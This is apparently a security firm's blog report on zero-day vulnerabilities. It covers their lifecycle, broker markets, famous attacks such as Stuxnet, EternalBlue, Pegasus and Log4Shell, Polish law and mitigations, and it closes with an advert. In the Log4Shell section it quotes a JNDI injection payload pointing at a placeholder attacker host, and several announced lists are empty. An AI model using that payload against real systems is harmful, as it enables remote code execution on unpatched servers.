Let's see how we can help you!
Leave a message and our dedicated advisor will contact you.
Send us a message
0/10000
Leave a message and our dedicated advisor will contact you.
The contemporary world of cybersecurity is a constant game of cat and mouse, but the rules of this game are fundamentally unfair. It is defined by a deep informational asymmetry. On one side stand the defenders—administrators, Blue Teams, software producers—who must secure thousands of potential entry points into a system. On the other side are the aggressors, who only need to find a single, solitary flaw. At the very center of this unequal balance of power lies a concept that has long caused dread in executive suites and intelligence agency corridors: the Zero-Day (0-day) vulnerability.
What exactly is this phenomenon? In common understanding, it is "a flaw for which there is no patch." However, this definition trivializes the problem. A zero-day is not just a code defect. It is a strategic asset. In an era of information warfare and industrial espionage, an unknown vulnerability is a weapon with kinetic potential, capable of destroying physical infrastructure, paralyzing hospitals, or surveilling political opposition. The terminology stems from simple, brutal math: "zero days" is the time software developers have had to prepare a defense against the attack. The moment the first hacker exploits such a flaw, the victims are completely defenseless. Traditional antivirus systems, relying on signatures of known threats, are silent because they do not know what to look for. This opens the so-called "Window of Vulnerability," a period during which aggressors can operate within the victims' systems like ghosts—invisible and unpunished.
In this report, we will dissect this ecosystem. We will not limit ourselves to generalities. We will look deep under the technical hood of exploits, trace the lifecycle of a vulnerability, examine the economics of the black market where prices reach millions of dollars, and review the most famous attacks in history. We will also consider how Poland fits into this global puzzle—with its specific legal regulations and local incidents.
Understanding a threat requires deconstructing its existence. A zero-day flaw does not appear out of nowhere magically. It is the result of a process, a dynamic set of events in which time is the key variable. This cycle can be divided into five key phases.
Everything begins long before the attack, in the quiet of developer offices. Errors arise unintentionally during the Software Development Lifecycle (SDLC). Programmers are only human. Time pressure, complex library dependencies, business logic errors, or improper component integration—all lead to the creation of vulnerabilities. The statistics are relentless here: every system of sufficient complexity contains errors. It is not a matter of "if," but "where." In this phase, the vulnerability is latent; it exists in the code, but no one knows about it.
This is the turning point. Who will find the flaw first? It is a race. If the vulnerability is discovered by security researchers (the so-called White Hats) or internal auditing teams, the process follows a remediation path. However, if the discoverer is a cybercriminal, an APT group (Advanced Persistent Threat), or an intelligence agency, the flaw becomes an "unknown unknown" to the rest of the world. At this moment, asymmetry is born. The possessor of the knowledge gains a massive strategic advantage.
Merely finding a code error (e.g., the fact that a program improperly handles long strings) is not enough to carry out an attack. Weaponization of the flaw is needed. The aggressor must create an exploit—specialized code that reliably and stably utilizes the discovered weakness to cause a specific, unintended system behavior. This can be Remote Code Execution (RCE), privilege escalation, or authentication bypass. Creating stable exploits for modern systems (like Windows 11 or iOS) is an engineering masterpiece, often requiring months of work.
This is the "golden time" for the attacker. It is the period between the aggressor's discovery of the flaw and the vendor's release of a patch. During this time, attacks are most effective, most destructive, and... most expensive. The victim has no dedicated protection. The only recourse is system mitigations or advanced behavioral analysis, which we will discuss later.
The release of a security patch theoretically ends the life of the flaw as a zero-day. It transforms into a so-called n-day vulnerability. However, history shows that this is by no means the end of the threat. Due to patching delays (especially in industrial OT systems or older servers), these flaws are exploited for many years after disclosure. There are known cases where decades-old errors are still used for intrusions because administrators neglected basic digital hygiene.
To fully grasp the threat, we must descend to the level of bits and bytes. What classes of errors are most often utilized to create cyberweapons? An analysis of CVE databases and historical incidents allows us to identify several key categories.
This is historically the most numerous and devastating group of errors, affecting software written in low-level languages like C and C++, where memory management rests with the programmer.
RCE is the "holy grail" for hackers. It allows for full control takeover of a victim's server or computer without physical access to the machine. A frequent vector here are deserialization errors. Modern applications (Java, .NET, Python) transfer complex data objects between them. The process of converting this data back into objects in memory is deserialization. If an application "recreates" a malicious object sent by the hacker without verification, it can automatically execute code at the moment of creation. A famous example of such a flaw was the bug in Atlassian Confluence.
Despite decades of education, SQL injection is still alive and well. It involves manipulating a database query. In the zero-day context, these flaws often appear in complex Content Management Systems or file transfer platforms. An example is the MOVEit Transfer case, where the CLOP group used a zero-day SQLi to massively steal data from US government agencies, proving that "old" techniques are still lethally effective.
Modern operating systems are robust. They have security measures like sandboxing. Therefore, a single vulnerability is rarely enough for a complete device takeover. Hackers must combine them into chains (kill chains). A typical attack scenario on a phone looks like this:
Information about a zero-day flaw is a commodity. And like any commodity, it has a price. This trade has evolved from a niche exchange on hobbyist forums into a powerful, global market worth billions of dollars. We can divide it into three segments, differing in clientele, prices, and ethics.
| Feature | White Market | Grey Market | Black Market |
|---|---|---|---|
| Participants | Vendors (Google, Microsoft), Bug Bounty Platforms (HackerOne, Bugcrowd) | Brokers (Zerodium, Crowdfense), Government Agencies, Intelligence Services, Surveillance Companies | Ransomware Groups, Cybercriminals, Dark Web Forums |
| Goal | Defensive: Patching flaws, improving security | Offensive/Intelligence: Espionage, surveillance, cyberwarfare | Criminal: Financial theft, extortion, botnets |
| Transparency | High (public acknowledgments, CVE) | Low (NDAs, state secrets) | None (anonymity, Tor, cryptocurrencies) |
| Prices | Low/Medium (thousands to hundreds of thousands USD) | High/Very High (millions USD) | Variable, monetization-dependent (Exploit-as-a-Service) |
The value of a zero-day flaw is a function of its rarity, reliability, and the level of access it offers. At the top of the price hierarchy are zero-click exploits for mobile devices, which require no interaction from the victim.
Zerodium, one of the most well-known brokers in the grey market, publishes purchase price lists that serve as trend barometers. A full zero-click exploit chain for iOS (iPhone) can reach $2,500,000 USD, while similar exploits for Android are also valued in the millions. Exploits for messengers (WhatsApp, Signal) or browsers are priced around $500,000 USD.
This price disparity ($50k in Bug Bounty vs. $2M at a broker) creates a powerful ethical dilemma for discoverers and encourages "stockpiling vulnerabilities"—hoarding flaws instead of patching them.
Companies like Zerodium or Crowdfense act as intermediaries, purchasing flaws from researchers and reselling them to government agencies and law enforcement. Critics point out that this model weakens global security because flaws remain unpatched in software used by millions of people, including critical infrastructure. There is a risk that flaws purchased by governments will leak and be taken over by criminal groups, as happened with NSA tools.
The history of cybersecurity has been written by several groundbreaking zero-day attacks. They have defined the modern battlefield.
Discovered in 2010, the Stuxnet worm is a milestone. It was the first precise industrial cyberweapon, created (according to common knowledge) by US and Israeli intelligence agencies. The target: the Iranian nuclear program. Stuxnet was unprecedented in the number of zero-day vulnerabilities it utilized. It employed a total of four previously unknown flaws in the Windows system:
The worm also used stolen digital certificates and precisely identified Siemens PLC controllers managing uranium enrichment centrifuges. It modified their rotational speed, leading to physical destruction of the machines, while simultaneously sending falsified data to monitoring systems showing normal operation. It is estimated that about 1,000 centrifuges were destroyed, significantly delaying the Iranian nuclear program. This demonstrated that code can destroy physical matter.
EternalBlue is the name of an exploit created by the NSA, utilizing a flaw in the SMBv1 (Server Message Block) protocol in Windows systems. The exploit utilized a buffer overflow error in handling specially crafted SMB packets (CVE-2017-0144). This allowed for remote code execution at the kernel level (System Privileges) on any unpatched computer with port 445 exposed.
In 2017, the Shadow Brokers group stole and published NSA tools, including EternalBlue. The consequences were catastrophic. North Korea used this vulnerability to create the WannaCry ransomware. In May 2017, within a few days, the virus infected over 200,000 systems in 150 countries. It paralyzed the British National Health Service (NHS), automotive factories, and logistics systems. This incident revealed the risk associated with governments stockpiling flaws—a weapon created for espionage became a weapon of mass destruction in the hands of criminals.
The Israeli Pegasus, spyware from NSO Group, represents the pinnacle of offensive engineering, offering the ability to surveil mobile devices without the user's knowledge. In 2021, researchers from Citizen Lab discovered the FORCEDENTRY exploit (CVE-2021-30860), targeting the iMessage service on iPhones.
The attack involved sending a message containing a specially crafted PDF file disguised as a GIF. The flaw was in the CoreGraphics library responsible for parsing the JBIG2 compression format. The exploit was able to create a virtual machine based on logic gates (AND, OR, XOR, NAND) inside the image parsing process, allowing for the execution of arbitrary code and bypassing Apple's advanced security features such as Pointer Authentication Codes (PAC).
The zero-click attack, requiring no link clicking, changed the perception of mobile security. Apple was forced to introduce "Lockdown Mode"—a mode that radically limits phone functionality to protect against such attacks. The technical virtuosity of this exploit still evokes awe and terror among analysts.
In December 2021, a flaw was discovered in the Log4j logging library (CVE-2021-44228), widely used in the Java ecosystem—from Minecraft servers to banking systems and VMware.
The flaw stemmed from Log4j's functionality that interpreted strings in logs. If an application logged a user-provided string (e.g., in the User-Agent header) containing ${jndi:ldap://attacker.com/exploit}, the library would connect to the indicated LDAP server, download a malicious Java class, and execute it (JNDI Injection).
Since Log4j is a component embedded in thousands of enterprise applications, this flaw had an almost infinite attack surface—half the internet was vulnerable. This showed how an error in a free open-source library can threaten the global digital economy.
How does the situation look in Poland against this backdrop? Poland is not just a passive observer. We have our successes, but also serious legal challenges.
In Poland, security research involves legal risk. The key provision is Article 267 of the Penal Code, which criminalizes the unlawful acquisition of information.
According to the law, anyone who gains access to information not intended for them without authorization (e.g., by breaking through security) is subject to imprisonment for up to 2 years. This also applies to so-called ethical hacking if the researcher acts without the explicit consent of the system owner.
In the Polish legal system, there is no default "Safe Harbor" clause for researchers. This means that discovering a zero-day flaw in a Polish service and attempting to verify it without consent can result in criminal charges. Therefore, it is crucial to operate within official Bug Bounty programs or Responsible Disclosure policies.
The central point of coordination in Poland is CERT Polska (operating within NASK), which serves as the national-level CSIRT.
Poland is not free from zero-day threats, both as a target and as a place for discovering flaws.
The year 2025 brought a series of events enabling the exchange of knowledge about the latest threats and defense techniques:
Are we defenseless? Not entirely. Although you cannot patch a flaw you do not know about, you can make its exploitation difficult.
Modern operating systems have built-in mechanisms designed to make exploitation of flaws difficult, even if they exist. They do not remove the error but make its exploitation much more difficult and expensive for the attacker.
| Mitigation Technique | Description | Effectiveness against 0-day |
|---|---|---|
| ASLR (Address Space Layout Randomization) | Random placement of key memory areas (stack, heap, DLL libraries) with each program run. | Makes it difficult for the attacker to predict memory addresses where the exploit code (shellcode) should jump. Requires the aggressor to find an additional "Information Disclosure" type flaw. |
| DEP (Data Execution Prevention) / NX Bit | Marking certain memory areas (e.g., stack) as non-executable. | Prevents execution of code injected by the attacker into data areas. The processor will refuse to execute instructions from these areas. |
| CFG (Control Flow Guard) | Real-time verification of indirect function calls. | Makes it difficult to hijack control flow, e.g., by overwriting function pointers. Blocks techniques like ROP (Return-Oriented Programming). |
| Stack Canaries | Placing random values (canaries) on the stack before the return address. | Detects buffer overflow attempts on the stack. If the canary value is changed, the program is immediately terminated. |
Since you cannot detect a file by its signature (hash), you must look for anomalies in system and user behavior.
winword.exe process (Microsoft Word) attempts to launch powershell.exe or connect to an external IP address, it is a strong Indicator of Compromise (IoC), regardless of whether a known or unknown flaw was used.In the critical period between flaw disclosure and deployment of an official patch, organizations use so-called virtual patching.
This is a mitigation technique involving modification of network security system rules (WAF, IPS) to block traffic exploiting the flaw before it reaches the vulnerable application. This process is faster than traditional patching, does not require server restarts, and minimizes downtime risk. Rules can be deployed in "Log Only" mode (detection only) to verify false alarms, then switched to "Block" mode.
In the case of SQL Injection vulnerabilities in MOVEit or Log4Shell, virtual patches at the WAF level were the first line of defense, blocking specific character strings characteristic of the attack.
Artificial Intelligence (AI) and Machine Learning (ML) are becoming key factors changing the dynamics of the fight against zero-day flaws, acting as a "double-edged sword."
Offensive AI:
Defensive AI:
Discovering zero-day flaws is not exclusively the domain of criminals. Research teams (such as Google Project Zero) and independent researchers play a crucial role in the security ecosystem.
The way information about found flaws is disclosed is controversial and creates tension between researchers and vendors.
The zero-day flaw phenomenon is an inherent feature of modern technology, resulting from the unavoidable complexity of IT systems. The evolution from simple memory errors to sophisticated "zero-click" chains and the militarization of these tools by state actors demonstrates that cyberspace has become a full-fledged theater of military operations.
For organizations and states, this means the need to change the defense paradigm. The "fortress" model is ineffective. It is necessary to adopt the Zero Trust and Assumed Breach approach—assuming that the system is or will soon be compromised. The key to survival is not perfect prevention (which is impossible in the face of 0-day), but maximum reduction of detection and response time, isolation of critical systems, and continuous investment in offensive testing of one's own security.
At the same time, global pressure on software vendors through Bug Bounty programs and transparent disclosure policies remains the most effective mechanism for systemically raising the security level of digital civilization.
Build your defense against zero-day attacks. SecurHUB offers comprehensive penetration testing of web applications, mobile apps, and network infrastructure to help detect vulnerabilities before hackers do. Our 24/7 SOC services with advanced behavioral detection and XDR platform provide protection even against unknown threats. We also offer source code audits in a DevSecOps model. Contact us.
Aleksander

Chief Technology Officer at SecurHub.pl
PhD candidate in neuroscience. Psychologist and IT expert specializing in cybersecurity.
On November 18, the internet held its breath. Cloudflare, the CDN giant, went silent for several hours. It wasn’t a DDoS attack, but a bug that exposed the fragility of modern infrastructure. Here is a deep technical analysis of how a single database permission change took down half the web.
The first rise in ransomware attacks in three years, state-sponsored campaigns exploiting Cisco firewall vulnerabilities, and urgent patches for VMware products—welcome to October.

The number of security incidents involving children has hit the roof - over 600,000 reports. We analyze NASK and Police data: from deadly TikTok challenges, through Roblox scams, to dramatic legal loopholes in sexting.
Loading comments...